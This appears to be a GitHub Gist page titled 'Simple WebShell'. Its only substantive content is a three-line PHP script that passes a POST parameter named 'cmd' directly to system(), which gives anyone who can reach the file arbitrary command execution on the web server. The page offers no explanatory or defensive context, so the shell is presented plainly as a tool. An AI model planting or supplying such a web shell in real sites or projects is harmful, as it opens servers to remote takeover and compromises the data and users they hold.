Skip to content

Instantly share code, notes, and snippets.

@4k1
Created September 16, 2020 22:05
Show Gist options
  • Save 4k1/d27d0c330e9e68800cb48f807fcf9254 to your computer and use it in GitHub Desktop.
Save 4k1/d27d0c330e9e68800cb48f807fcf9254 to your computer and use it in GitHub Desktop.
Simple WebShell
<?php
system($_POST['cmd']);
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment